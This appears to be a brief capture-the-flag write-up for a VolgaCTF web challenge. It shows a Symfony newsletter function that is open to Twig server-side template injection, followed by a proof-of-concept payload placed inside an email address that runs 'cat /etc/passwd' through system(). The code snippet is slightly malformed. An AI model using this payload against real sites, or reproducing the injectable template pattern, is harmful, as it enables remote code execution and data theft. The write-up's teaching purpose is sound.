Rating: 5.0
Vulnerable function:
```
public function subscribe(Request $request, MailerInterface $mailer)
{
$msg = '';
$email = filter_var($request->request->get('email', ''), FILTER_VALIDATE_EMAIL);
if($email !== FALSE) {
$name = substr($email, 0, strpos($email, '@'));
$content = $this->get('twig')->createTemplate(
"
Hello ${name}.
Thank you for subscribing to our newsletter.
Regards, VolgaCTF Team
" $mail = (new Email())->from('[email protected]')->to($email)->subject('VolgaCTF Newsletter')->html($content);
$mailer->send($mail);
$msg = 'Success';
} else {
$msg = 'Invalid email';
}
return $this->render('main.twig', ['msg' => $msg]);
}
```
RCE PoC: `email="{{['cat${IFS}/etc/passwd']|filter('system')}}"@your.domain`